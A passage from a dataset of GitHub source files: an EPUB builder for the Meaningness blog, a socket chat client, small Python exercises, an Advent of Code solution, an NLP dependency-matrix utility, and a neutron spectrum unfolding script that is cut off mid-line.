media_type=\"text/css\",\n            content=style\n        )\n\n        self.book.add_item(nav_css)\n\n\nclass MeaningnessEbook:\n    def __init__(self, html_root, tmp_path):\n        self.tmp_path = tmp_path\n\n        self.html_root = html_root\n        self.book = BookGenerator('Meaningness')\n\n        self.book.add_author('David Chapman')\n        self.book.set_language('en')\n        self.book.add_metadata('DC', 'date', \"2020-01-27\")\n        self.book.add_metadata('DC', 'generator', '', {'name': 'generator',\n                                                       'content': PROJECT_URL})\n\n        self.chapters_metadata = list(self.parse_book_contents(html_root))\n\n        path_chapter_map = {}\n        for article_path, chapter_fn in self.chapters_metadata:\n            chapter = self.convert_chapter(article_path, chapter_fn)\n            self.book.add_chapter(chapter)\n            path_chapter_map[article_path] = chapter\n\n        self.book.toc = self.parse_toc(path_chapter_map)\n\n    def parse_book_contents(self, html_root):\n        logger.info(\"Parsing book contents..\")\n\n        with open(os.path.join(html_root, \"index.html\")) as f:\n            index_html = f.read()\n\n        index_dom = dhtmlparser.parseString(index_html)\n        toc_dom = index_dom.find(\"nav\", {\"class\": \"book-tree\"})[0]\n        for a_el in toc_dom.find(\"a\"):\n            href = a_el.params[\"href\"]\n            yield (href, href)\n\n    def parse_toc(self, path_chapter_map):\n        logger.info(\"Parsing TOC structure from index.html..\")\n\n        with open(os.path.join(self.html_root, \"index.html\")) as f:\n            index_html = f.read()\n\n        index_dom = dhtmlparser.parseString(index_html)\n        toc_dom = index_dom.find(\"nav\", {\"class\": \"book-tree\"})[0]\n\n        def process(toc_dom):\n            li_structure = []\n            for li in toc_dom.wfind(\"li\").childs:\n                if li.params.get(\"class\", \"\") == \"\":\n                    sub_chapters = process(li.find(\"ul\")[0])\n                    last_li = li_structure.pop()\n                    li_structure.append([last_li, sub_chapters])\n                else:\n                    href = 
li.find(\"a\")[0].params[\"href\"]\n                    li_structure.append(path_chapter_map[href])\n\n            return li_structure\n\n        return process(toc_dom)\n\n    def convert_chapter(self, article_path, chapter_fn, title=None):\n        logger.info(\"Converting %s\", article_path)\n\n        full_path = os.path.join(self.html_root, article_path)\n        if os.path.isdir(full_path):\n            raise ValueError(full_path)\n\n        with open(full_path) as f:\n            dom = dhtmlparser.parseString(f.read())\n\n        if not title:\n            title = dom.find(\"title\")[0].getContent()\n            title = title.replace(\" | Meaningness\", \"\", 1)\n\n        body = dom.find(\"body\")[0]\n\n        self.remove_fluff(body)\n        self._inline_images(body, article_path)\n\n        chapter = epub.EpubHtml(title=title, file_name=chapter_fn)\n        chapter.content = body.getContent()\n\n        return chapter\n\n    def remove_fluff(self, body):\n        empty = dhtmlparser.parseString(\"\")\n\n        def replace(selector):\n            for el in selector:\n                el.replaceWith(empty)\n\n        replace(body.find(\"div\", {\"class\": \"nocontent\"}))\n        replace(body.find(\"div\", {\"class\": \"tertiary-content-wrapper\"}))\n        replace(body.find(\"div\", {\"class\": \"more-link\"}))\n        replace(body.find(\"div\", {\"class\": \"view-content\"}))\n        replace(body.find(\"div\", {\"class\": \"block-content content\"}))\n        replace(body.find(\"div\", {\"class\": \"region region-content-aside\"}))\n        replace(body.find(\"div\", {\"role\": \"search\"}))\n        replace(body.find(\"div\", {\"class\": \"comment_bubble_wrapper\"}))\n        replace(body.find(\"div\", fn=lambda x: \"block-meaningness-navigation\" in x.params.get(\"class\", \"\")))\n        replace(body.find(\"header\"))\n        replace(body.find(\"footer\"))\n        replace(body.find(\"div\", {\"id\": \"tertiary-content-wrapper\"}))\n        replace(body.find(\"nav\", {\"class\": \"clearfix\"}))\n\n        return body.find(\"main\")[0]\n\n    def _inline_images(self, body, article_path):\n        for img in body.find(\"img\"):\n            src = img.params[\"src\"]\n\n            if src.startswith(\"../\"):\n                src = src.replace(\"../\", \"\")\n\n            try:\n                if src.startswith(\"http://\") or src.startswith(\"https://\"):\n                    epub_img = self._inline_remote_image(src)\n                else:\n                    epub_img = self._inline_local_image(img, src)\n            except IOError:\n                continue\n\n            self.book.add_image(epub_img)\n\n            root = \"\"\n            if \"/\" in article_path:\n                root = \"../\"\n            img.params[\"src\"] = root + epub_img.file_name\n\n\n    def _inline_remote_image(self, src):\n        epub_img = epub.EpubImage()\n\n        digest = hashlib.sha256(src.encode(\"utf-8\")).hexdigest()\n        digest_name = \"{}.{}\".format(digest, src.rsplit(\".\")[-1])\n        epub_img.file_name = os.path.join(self.tmp_path, digest_name)\n\n        if not os.path.exists(epub_img.file_name):\n            logger.info(\"Downloading remote image %s\", src)\n\n            resp = requests.get(src)\n            with open(epub_img.file_name, \"wb\") as f:\n                f.write(resp.content)\n\n        logger.info(\"Remote image %s added as %s\", src, epub_img.file_name)\n\n        return epub_img\n\n    def _inline_local_image(self, img, src):\n        epub_img = epub.EpubImage()\n        epub_img.file_name = src\n\n        image_path = os.path.join(self.html_root, src)\n        if not os.path.exists(image_path):\n            logger.error(\"File %s doesn't exist, skipping!\", image_path)\n            raise IOError(\"Can't open %s\" % image_path, image_path)\n\n        with open(image_path, \"rb\") as f:\n            epub_img.content = f.read()\n\n        if \"style\" in img.params:\n            del img.params[\"style\"]\n\n        logger.info(\"Local image %s added\", epub_img.file_name)\n\n        return epub_img\n\n    def generate_ebook(self, path):\n        return self.book.generate_ebook(path)\n\n\ndef put_ebook_together(html_path):\n    tmp_name = \"tmp_images\"\n\n    if not 
os.path.exists(tmp_name):\n os.mkdir(tmp_name)\n\n book = MeaningnessEbook(html_path, tmp_name)\n book.generate_ebook('meaningness.epub')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"PATH\",\n help=\"Path to the directory with the blog section about Self.\"\n )\n args = parser.parse_args()\n\n put_ebook_together(args.PATH)\n","repo_name":"Bystroushaak/meaningness.com_epub_generator","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"13620829612","text":"import common_function\n\nif __name__ == \"__main__\":\n\titem_user_dict = common_function.read_item_user_dict(\"../data/repo_package_train.txt\")\n\ttop_20_items = sorted(item_user_dict.iteritems(), key=lambda d:len(d[1]), reverse = True)[:20]\n\tpackage_id_name_dict = common_function.read_dict(\"../data/package_dict.txt\")\n\twriter = open(\"recommendation_result_most_popular.txt\", \"wb\")\n\tfor i in range(0, 20):\n\t\twriter.write(package_id_name_dict[top_20_items[i][0]])\n\t\tif i != 19:\n\t\t\twriter.write('\\t')\n\t\telse:\n\t\t\twriter.write('\\n')\n","repo_name":"pangjac/JediGit","sub_path":"model/most_popular.py","file_name":"most_popular.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72728976785","text":"import random\n\ncapitals_dict = {\"Alabama\": \"Montgomery\", \"Alaska\": \"Juneau\", \"Arizona\": \"Phoenix\",\n \"Arkansas\": \"Little Rock\", \"California\": \"Sacramento\", \"Colorado\": \"Denver\",\n \"Connecticut\": \"Hartford\", \"Delaware\": \"Dover\", \"Florida\": \"Tallahassee\",\n \"Georgia\": \"Atlanta\", \"Hawaii\": \"Honolulu\", \"Idaho\": \"Boise\", \"Illinois\": \"Springfield\",\n \"Indiana\": \"Indianapolis\", \"Iowa\": \"Des Moines\", \"Kansas\": \"Topeka\",\n \"Kentucky\": \"Frankfort\", \"Louisiana\": \"Baton Rouge\", \"Maine\": \"Augusta\",\n \"Maryland\": \"Annapolis\", \"Massachusetts\": \"Boston\", \"Michigan\": \"Lansing\",\n \"Minnesota\": \"Saint Paul\", \"Mississippi\": \"Jackson\", \"Missouri\": \"Jefferson City\",\n \"Montana\": \"Helena\", \"Nebraska\": \"Lincoln\", \"Nevada\": \"Carson City\",\n \"New Hampshire\": \"Concord\", \"New Jersey\": \"Trenton\", \"New Mexico\": \"Santa Fe\",\n \"NewYork\": \"Albany\", \"North Carolina\": \"Raleigh\", \"North Dakota\": \"Bismarck\",\n \"Ohio\": \"Columbus\", \"Oklahoma\": \"Oklahoma City\", \"Oregon\": \"Salem\",\n \"Pennsylvania\": \"Harrisburg\", \"Rhode Island\": \"Providence\", \"SouthCarolina\": \"Columbia\",\n \"South Dakota\": \"Pierre\", \"Tennessee\": \"Nashville\", \"Texas\": \"Austin\",\n \"Utah\": \"Salt Lake City\", \"Vermont\": \"Montpelier\", \"Virginia\": \"Richmond\",\n \"Washington\": \"Olympia\", \"WestVirginia\": \"Charleston\", \"Wisconsin\": \"Madison\",\n \"Wyoming\": \"Cheyenne\"}\n\n\ndef main():\n num_correct = 0\n num_wrong = 0\n while True:\n # for item in capitals_dict:\n # print(\"|STATE:| {} |CAPITAL:| {}\".format(item, capitals_dict[item]))\n\n rand_state = random.choice(list(capitals_dict.keys()))\n user_capital = input(f\"\\nWhat is the capital of {rand_state}: \").lower()\n\n # Random state answer\n if rand_state in capitals_dict:\n print(capitals_dict.get(rand_state))\n\n if user_capital == capitals_dict.get(rand_state).lower():\n num_correct += 1\n print(f\"User answer {user_capital} is correct\"\n f\"\\ncorrect total: 
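# The most_popular.py snippet above is Python 2 code: dict.iteritems() no
# longer exists, and a file opened in "wb" mode cannot take str. A rough
# Python 3 sketch of the same top-20 selection, with a small hypothetical
# dict standing in for the data read from repo_package_train.txt:
item_user_dict = {"pkg_a": {1, 2, 3}, "pkg_b": {1}, "pkg_c": {1, 2}}
top_items = sorted(item_user_dict.items(), key=lambda d: len(d[1]), reverse=True)[:20]
# top_items[0][0] == "pkg_a"; writing the names would then use open(..., "w").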
{num_correct}\")\n        else:\n            num_wrong += 1\n            print(f\"wrong answer\"\n                  f\"\nincorrect total: {num_wrong}\")\n\n        replay_code = input(\"Try again? (y/n): \")\n        if replay_code.lower() != \"y\":\n            break\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Dudi1896/PycharmProjects","sub_path":"Lab8/state_capitals.py","file_name":"state_capitals.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"30525698916","text":"#Libraries required\nimport socket#for sockets\nimport select#gives the IO capabilities irrespective of OS\nimport errno #for handling specific errors\nimport sys #for control over the terminal\nHEADER_LENGTH = 10#header length\n\n#IP address and port number\nIP = \"127.0.0.1\"\nPORT = 1234\n#Grab the client username\nmyUsername = input(\"Enter your Username : \")\nclient_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)#Socket object\nclient_socket.connect((IP,PORT))#Connect it to the server\nclient_socket.setblocking(False) #This allows the receive loop to run without blocking\n\nusername = myUsername.encode('utf-8')\nusername_header = f\"{len(username):<{HEADER_LENGTH}}\".encode('utf-8')\nclient_socket.send(username_header+username)\n\nwhile True:\n\t#Sending things\n\tmessage=input(f\"{myUsername} > \")\n\tif message:\n\t\tmessage = message.encode('utf-8')\n\t\tmessage_header = f\"{len(message):<{HEADER_LENGTH}}\".encode('utf-8')\n\t\tclient_socket.send(message_header+message)\n\n\ttry:\n\t\twhile True:\n\t\t\t#Receive things\n\t\t\tusername_header = client_socket.recv(HEADER_LENGTH)\n\t\t\tif not len(username_header):\n\t\t\t\tprint(\"Connection lost by the server\")\n\t\t\t\tsys.exit()\n\t\t\tusername_length = int(username_header.decode('utf-8').strip())\n\t\t\tusername = client_socket.recv(username_length).decode('utf-8')\n\t\t\tmessage_header = client_socket.recv(HEADER_LENGTH)\n\t\t\tmessage_length = int(message_header.decode('utf-8').strip())\n\t\t\tmessage = client_socket.recv(message_length).decode('utf-8')\n\t\t\tprint(f\"{username} > {message}\")\n\n\texcept IOError as e:\n\t\tif e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:\n\t\t\tprint('Reading error',str(e))\n\t\t\tsys.exit()\n\t\t\n\texcept Exception as e:\n\t\tprint('General Error',str(e))\n\t\tpass\n\n\n","repo_name":"Chaitanya-Varun/Sockets","sub_path":"ChatClient.py","file_name":"ChatClient.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"24702303381","text":"while True:\n    try:\n        frase = ' '.join(input('Digite uma frase: ').strip().lower().split())\n        if len(frase) == 0:\n            raise KeyError\n    except:\n        print('\\033[1;31mOcorreu um erro!\\033[m')\n    else:\n        print(f'''{frase.title()}\nA letra A aparece {frase.count('a')} vezes na frase\nA primeira letra A aparece na posição {frase.find('a')+1 if frase.find('a') != -1 else 'xx'}\nA última letra A aparece na posição {frase.rfind('a')+1 if frase.rfind('a') != -1 else 'xx'}\n''')\n        break\n","repo_name":"HanatielVargas/Atividades-Python","sub_path":"Curso em Vídeo/Ex 026/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"29375446697","text":"# encoding=utf-8\nimport os\n\nimport torch\n\n\ndef get_dep_mat(all_head, mask, dtype=torch.long):\n    \"\"\"\n    1. a token without a dependency relation has no head node.\n    2. 
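# ChatClient.py above frames every payload with a fixed 10-character ASCII
# length header. A minimal sketch of that framing without sockets, plus the
# non-blocking check it needs -- note that EAGAIN and EWOULDBLOCK both live
# in the errno module:
import errno

HEADER_LENGTH = 10

def frame(text: str) -> bytes:
    data = text.encode('utf-8')
    return f"{len(data):<{HEADER_LENGTH}}".encode('utf-8') + data

def unframe(packet: bytes) -> str:
    length = int(packet[:HEADER_LENGTH].decode('utf-8').strip())
    return packet[HEADER_LENGTH:HEADER_LENGTH + length].decode('utf-8')

assert unframe(frame("hello")) == "hello"
WOULD_BLOCK = (errno.EAGAIN, errno.EWOULDBLOCK)  # what a non-blocking recv raises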
every token has the \"itself\" (diagonal) relation.\n    3. the mask applies only to real tokens.\n    \"\"\"\n    batch_size, tgt_len = all_head.shape\n\n    flat_all_head = all_head.view(-1)\n    add = torch.arange(0, batch_size * tgt_len * tgt_len, tgt_len).to(all_head.device)\n    flat_all_head = flat_all_head + add\n    same = add + torch.arange(0, tgt_len).repeat(batch_size).to(all_head.device)\n    dep_mat = all_head.new_zeros((batch_size, tgt_len, tgt_len), dtype=dtype).fill_(0)\n\n    dep_mat = dep_mat.view(-1)\n    dep_mat[flat_all_head] = 1 # dependency relation\n\n    if mask is not None:\n        dep_mat = dep_mat.view(batch_size, tgt_len, tgt_len)\n        dep_mat.masked_fill_(~mask.unsqueeze(-1), 0)\n        dep_mat.masked_fill_(~mask.unsqueeze(-2), 0)\n\n        dep_mat = dep_mat.view(-1)\n\n    # dep_mat[same] = 1 # diag relation\n    dep_mat = dep_mat.view(batch_size, tgt_len, tgt_len)\n    if mask is not None:\n        eye_mat = torch.eye(tgt_len, tgt_len).cuda().bool().unsqueeze(0).repeat(batch_size, 1, 1)\n        eye_mat.masked_fill_(mask.unsqueeze(-1), False)\n        eye_mat.masked_fill_(mask.unsqueeze(-2), False)\n        dep_mat.masked_fill_(eye_mat, 1)\n\n    # make the matrix symmetric\n    mask_1 = dep_mat == 1\n    mask_1 = mask_1.transpose(-1, -2)\n    dep_mat.masked_fill_(mask_1, 1)\n\n    return dep_mat\n\n\ndef load_dependency_head_tree(tree_path):\n    dependency_list = []\n    print(tree_path)\n    with open(tree_path, \"r\") as f:\n        for line in f:\n            heads = line.strip().split(',')\n            c = [int(i) for i in heads] # contain the bos and eos token\n            dependency_list.append(c)\n\n    return dependency_list\n\n\nDependencyFileMapping = {\n    \"iwslt14_deen_distill\": \"/home/wangdq/dependency/iwslt16-deen/\",\n    \"wmt14_ende_distill\": \"/home/data_ti5_c/wangdq/new/nat/dependency/wmt14_ende_distill\"\n}\n\n\nclass Tree():\n    def __init__(self, valid_subset=\"valid\", dep_file=\"\", **kwargs):\n        dir_name = self.get_file_dir(dep_file)\n\n        if valid_subset != \"test\":\n            self.train_tree = load_dependency_head_tree(os.path.join(dir_name, \"train.tree\"))\n        else:\n            self.train_tree = None\n\n        self.valid_tree = load_dependency_head_tree(os.path.join(dir_name, valid_subset + \".tree\"))\n\n    def get_file_dir(self, dep_file):\n        return DependencyFileMapping.get(dep_file, \"\")\n\n    def get_sentences(self, index_list, training):\n        tree = self.train_tree if training else self.valid_tree\n        return [tree[id] for id in index_list]\n\n\nclass ParentRelationMat():\n    def __init__(self, valid_subset=\"valid\", dep_file=\"\", **kwargs):\n        tree = Tree(valid_subset, dep_file)\n        self.train_mat = self.process_mat(tree.train_tree)\n        self.valid_mat = self.process_mat(tree.valid_tree)\n\n    def process_mat(self, tree):\n        if tree is None or len(tree) <= 0:\n            return None\n        result = []\n        for sample_id, head in enumerate(tree):\n            head = torch.LongTensor(head)\n            dep_mat = get_dep_mat(head.unsqueeze(0), None, dtype=torch.uint8).squeeze(0)\n            result.append(dep_mat)\n\n        return result\n\n    def get_relation_mat(self, sample_ids, reference, training=True):\n        batch_size, seq_len = reference.size()\n        dep_tensor = torch.eye(seq_len, seq_len).repeat(batch_size, 1, 1).to(reference)\n        mask = reference.ne(1) # pad == 1\n        dep_tensor.masked_fill_(mask.unsqueeze(-1), 0)\n        dep_tensor.masked_fill_(mask.unsqueeze(-2), 0)\n\n        mat = self.train_mat if training else self.valid_mat\n        relations = [mat[id] for id in sample_ids]\n        for index, relation in enumerate(relations):\n            length, _ = relation.size()\n            dep_tensor[index][:length, :length] = relation.long()\n\n        return 
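# A tiny worked example of the flat-index trick inside get_dep_mat above:
# adding each token's row offset turns the head indices into one scatter
# that sets mat[b, t, head[b, t]] = 1. The head values are hypothetical.
import torch

heads = torch.tensor([[1, 0, 1]])        # token t has head index heads[0, t]
B, T = heads.shape
offsets = torch.arange(0, B * T * T, T)  # start of row (b, t) in the flat view
flat = torch.zeros(B * T * T, dtype=torch.long)
flat[heads.view(-1) + offsets] = 1
mat = flat.view(B, T, T)
mat = mat | mat.transpose(-1, -2)        # mirror, as the masked_fill_ above does
# mat[0] == [[0, 1, 0], [1, 0, 1], [0, 1, 0]]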
dep_tensor\n","repo_name":"wangqi1996/inter-nat","sub_path":"inter_nat/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19627935945","text":"\nimport math\nfrom utils import Input, printResult\nfrom intcode import Intcode\n\n# https://adventofcode.com/2019/day/11\n\ninput = Input(2019, 11).lines()[0]\n\ndef runWith(code):\n queue = [code]\n if code == 1:\n queue = [1] + [0] * 1000000\n robot = Intcode(input, queue).run()\n field = {}\n p = (0, 0)\n d = 0\n dirs = {0: [-1, 0], 1: [0, 1], 2: [1, 0], 3: [0, -1]}\n while True:\n color = next(robot, None)\n if color is None:\n break\n field[p] = color\n d = (d - 1 + next(robot) * 2) % 4\n p = (p[0] + dirs[d][0], p[1] + dirs[d][1])\n queue.append(field.get(p, 0))\n return field\n\nfield = runWith(0)\nprintResult(1, len(field))\n\nfield = runWith(1)\nminy = min(p[0] for p in field)\nmaxy = max(p[0] for p in field)\nminx = min(p[1] for p in field)\nmaxx = max(p[1] for p in field)\n\nid = \"\"\npalette = {0: \" \", 1: \"@@\"}\nfor y in range(miny, maxy+1):\n id += \"\\n\" + \"\".join(\n palette[field.get((y, x), 0)]\n for x in range(minx, maxx+1))\n\nprintResult(2, id)\n","repo_name":"Zefick/Advent-of-Code","sub_path":"src/Python/2019/Day11.py","file_name":"Day11.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35255106125","text":"import re\n\n\ndef log_parser(filename: str):\n with open(filename, \"r\") as f:\n lines = f.readlines()\n\n points = []\n for line in lines:\n finds = re.findall(\"Position\\(x=(\\d+\\.\\d+), y=(\\d+\\.\\d+)\", line)\n if finds:\n points.append(tuple(map(float, reversed(finds[0]))))\n\n return points\n","repo_name":"somamvp/voyager-ml-server","sub_path":"log_gps_parser.py","file_name":"log_gps_parser.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12635743479","text":"from turtle import Turtle\nimport random\n\n\nclass Food(Turtle):\n def __init__(self):\n super().__init__()\n self.shape(\"circle\")\n self.color(\"white\")\n self.penup()\n self.shapesize(stretch_wid=0.5, stretch_len=0.5)\n self.speed(\"fastest\")\n self.refresh()\n\n def refresh(self):\n rand_x = random.randint(-270, 270)\n rand_y = random.randint(-270, 270)\n self.goto(rand_x, rand_y)","repo_name":"SamarthTech/Pyhton-GUI-Projects","sub_path":"SnakeGameImproved/food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"21895920671","text":"# This will run all of the case studies for my MAXED portion of my paper.\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.optimize import dual_annealing\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom sklearn.preprocessing import normalize\nimport imageio\nfrom scipy.stats import ttest_ind\n\nfont = {'size': 12}\nmatplotlib.rc('font',**font)\n\ndef Z(lamb, *params):\n # This function gets passed into the dual annealing function from scipy. 
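# A quick check of the Position regex in log_gps_parser above against a
# hypothetical log line; reversed() swaps each captured (x, y) pair so the
# returned tuples are (y, x):
import re

line = "12:00:01 moved to Position(x=127.53, y=37.41) heading=90"
pts = [tuple(map(float, reversed(m)))
       for m in re.findall(r"Position\(x=(\d+\.\d+), y=(\d+\.\d+)", line)]
# pts == [(37.41, 127.53)]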
\n # This function\n # guess_spec = the guess spectrum for the dual_annealing process\n # det_res_matrix = the response function that will be unfolded\n # std = the standard uncertainty of the detector response\n # det_res = actual measurement from the detectors\n # lamb = hyperparameters for minimization\n guess_spec, det_res_matrix, std, det_res = params\n omega = det_res.size\n # print(f'det_res_matrix.shape[0] is {det_res_matrix.shape[0]}')\n Z = np.abs(-guess_spec.dot(np.exp(-lamb.dot(det_res_matrix)))\n -(omega*(lamb.dot(std))**2)**0.5\n -det_res.dot(lamb))\n return Z\n\ndef unfold_Spectrum(guess_spec, lamb, det_res_matrix):\n # print(lamb.dot(det_res_matrix))\n print(-lamb.dot(det_res_matrix))\n return guess_spec*np.exp(-lamb.dot(det_res_matrix))\n\ndef run_case(gs, sm, drm, dr, dre, ts, mi, which_drm, which_spec, im_num, fig_names):\n # Variables:\n # gs - guess spectrum\n # sm - spectrum modifier\n # drm - detector response matrix\n # dr - detector response\n # dre - detector response error\n # ts - true spectrum\n # mi - maximum iterations for dual annealing\n params = (gs*sm, drm, dr*.1, dr)\n m = len(dr) # number of detectors in the detector response.\n bounds = list(zip([-10]*m, [10]*m))\n res = dual_annealing(Z, bounds, args=params, maxiter=mi) # minimize Z\n unfolded_spec = unfold_Spectrum(gs, res.x, drm) # unfold Z with lambdas (res.x)\n print(f't-test of spectrum: stat={ttest_ind(unfolded_spec,gs)[0]}, p={ttest_ind(unfolded_spec,gs)[1]}')\n det_res_unfolded = drm.dot(unfolded_spec)\n chi2_dr = (det_res_unfolded-dr).T.dot(np.linalg.inv(np.diag(dr*.1))).dot(det_res_unfolded-dr)\n MAC = np.dot(unfolded_spec,ts)**2/(np.dot(unfolded_spec,unfolded_spec)*np.dot(ts,ts))\n # chi2_spec = (unfolded_spec-ts).T.dot(np.linalg.inv(np.diag((ts+1e5)*.1))).dot(unfolded_spec-ts)\n\n print('The best results led to:')\n print(f' For the Detector Response: chi2 = {chi2_dr}, chi2 per DOF = {chi2_dr/m}')\n print(f' For the Spectrum: MAC = {MAC}')\n fig,(ax0,ax1) = plt.subplots(1,2)\n fig.suptitle('MAXED Unfolding Spectra Results\\n' + f'DRM: {which_drm}\\n' + f'Guess Spectrum: {which_spec}*{sm}')\n \n ax0.step(E_bins, unfolded_spec, label='Unfolded', color='#1f77b4')\n ax0.step(E_bins, ts, label='Real', linestyle=':', color='#ff7f0e')\n ax0.step(E_bins, gs*sm, 'k', label='Guess', linestyle='--')\n ax0.semilogx()\n ax0.set_ylabel('Fluence per Unit \\nLog Energy (Lethargy)')\n ax0.set_xlabel('Energy (MeV)')\n ax0.set_ylim((0,1))\n ax0.legend(loc='upper left', fontsize=8)\n # ax0.text(1e-9,.2,f'$\\chi^2$ = {round(chi2_dr,2)}')\n ax0.text(1e-9,.2,f'MAC = {round(MAC,5)}')\n # ax0.text(1e-9,.1,f't={round(ttest_ind(unfolded_spec,gs)[0],2)}',fontweight='normal')\n ax0.set_title('Spectrum Comparison')\n \n # radii = [14, 13, 12, 11, 10, 9, 8, 6, 3, 0]\n if len(dr) == 10:\n radii = [0, 3, 6, 8, 9, 10, 11, 12, 13, 14]\n else:\n radii = [14,13,12,11,10,9,8,6,3,0,-3,-6,-8,-9,-10,-11,-12,-13,-14,\n 14,13,12,11,10,9,8,6,3,0,-3,-6,-8,-9,-10,-11,-12,-13,-14,\n 14,13,12,11,10,9,8,6,3,0,-3,-6,-8,-9,-10,-11,-12,-13,-14]\n ax1.scatter(radii, det_res_unfolded, s=10, label='Unfolded', color='#1f77b4')\n ax1.scatter(radii, dr, s=10, label='Real', color='#ff7f0e')\n ax1.errorbar(radii, dr, yerr=dre, capsize=5, linestyle=None, color='#ff7f0e')\n ax1.set_ylabel('Fluence Response (-)')\n ax1.set_xlabel('PNS depth (cm)')\n ax1.set_ylim((0.01,0.2))\n ax1.legend(loc='upper left', fontsize=8)\n ax1.text(8,.15,f'$\\chi^2$ = {round(chi2_dr,2)}')\n # 
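# A toy end-to-end run of the Z potential defined above through
# dual_annealing: two detectors, three energy bins, every number
# hypothetical. res.x holds the optimal lambdas, and the MAXED spectrum is
# guess * exp(-lambda . R), exactly as unfold_Spectrum computes:
import numpy as np
from scipy.optimize import dual_annealing

R = np.array([[0.6, 0.3, 0.1],
              [0.1, 0.3, 0.6]])        # toy response matrix (m x n)
phi_guess = np.array([0.4, 0.4, 0.2])  # default (guess) spectrum
d = R.dot(np.array([0.5, 0.3, 0.2]))   # synthetic "measured" response
params = (phi_guess, R, 0.1 * d, d)

res = dual_annealing(Z, bounds=[(-10, 10)] * len(d), args=params, maxiter=200)
phi_unfolded = phi_guess * np.exp(-res.x.dot(R))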
ax1.text(6,.1,f't={round(ttest_ind(det_res_unfolded,dr)[0],2)}',fontweight='normal')\n ax1.set_title('Detector Response Comparison')\n\n fig.tight_layout()\n # fig.show()\n fig_name = f'{which_drm}_{which_spec}_{im_num}.png'\n fig.savefig(fig_name,dpi=300)\n fig_names.append(fig_name)\n return fig_names\n\ndef make_gif(path,filenames):\n with imageio.get_writer(path, mode='I', duration=0.5) as writer:\n for filename in filenames:\n image = imageio.imread(filename)\n writer.append_data(image)\n###-------------------------------------------------------------------------###\n# Convert IAEA Cf-252 spectrum into AWE energy bins #\n###-------------------------------------------------------------------------###\nIAEA_spectra_df = pd.read_csv(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\03-IAEA_Spectra\\IAEA_Spectra_84_Ebins.csv')\nspec_names = IAEA_spectra_df.columns\nIAEA_spectra = IAEA_spectra_df.to_numpy()\n\n# The various spectra. The spectra names (and corresponding column indices) can\n# be found in the spec_names variable.\nCf_spec = IAEA_spectra[:,1]\nD2O_mod_Cf_spec = IAEA_spectra[:,2]\nAmB_spec = IAEA_spectra[:,4]\nH2O_mod_PuBe_spec = IAEA_spectra[:,9]\n\nE_bins = np.array([1e-9,1.58e-9,2.51e-9,3.98e-9,6.31e-9,\n 1e-8,1.58e-8,2.51e-8,3.98e-8,6.31e-8,\n 1e-7,1.58e-7,2.51e-7,3.98e-7,6.31e-7,\n 1e-6,1.58e-6,2.51e-6,3.98e-6,6.31e-6,\n 1e-5,1.58e-5,2.51e-5,3.98e-5,6.31e-5,\n 1e-4,1.58e-4,2.51e-4,3.98e-4,6.31e-4,\n 1e-3,1.58e-3,2.51e-3,3.98e-3,6.31e-3,\n 1e-2,1.58e-2,2.51e-2,3.98e-2,6.31e-2,\n 1e-1,1.26e-1,1.58e-1,2e-1,2.51e-1,3.16e-1,3.98e-1,5.01e-1,6.31e-1,7.94e-1,\n 1e0,1.12e0,1.26e0,1.41e0,1.58e0,1.78e0,2e0,2.24e0,2.51e0,2.82e0,3.16e0,\n 3.55e0,3.98e0,4.47e0,5.01e0,5.62e0,6.31e0,7.08e0,7.94e0,8.91e0,\n 1e1,1.12e1,1.26e1,1.41e1,1.58e1,1.78e1,2e1,2.51e1,3.16e1,3.98e1,5.01e1,6.31e1,7.94e1,1e2])\n\n###-------------------------------------------------------------------------###\n# Import detector response matrices #\n###-------------------------------------------------------------------------###\n# Detector response matrix for the plane source, depth-averaged tallies:\nplane_avg_drm_df = pd.read_csv(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\01-Detector_Response_Matrices\\DRM_PlaneSource_1e10nps_Li6_averagedMeanTallies.csv')\nplane_avg_drm = plane_avg_drm_df.to_numpy()[0:10,1:].astype('float64')\nplane_avg_drm = normalize(plane_avg_drm,axis=1,norm='l1')\n\n# Detector response matrix for the spherical source, depth-averaged tallies:\nspheric_avg_drm_df = pd.read_csv(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\DRM_SphericalShellSource_1e10nps_Li6_averagedMeanTallies.csv')\nspheric_avg_drm = spheric_avg_drm_df.to_numpy()[0:10,1:].astype('float64')\nspheric_avg_drm = normalize(spheric_avg_drm,axis=1,norm='l1')\n\n# Detector response matrix for the plane source, all tallies separate:\nplane_drm_df = pd.read_csv(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\DRM_PlaneSource_1e10nps_Li6_meanTallies.csv')\nplane_drm = plane_drm_df.to_numpy()[0:57,1:].astype('float64')\nplane_drm = normalize(plane_drm,axis=1,norm='l1')\n\n# Detector response matrix for the spherical source, all tallies separate:\nspheric_drm_df = 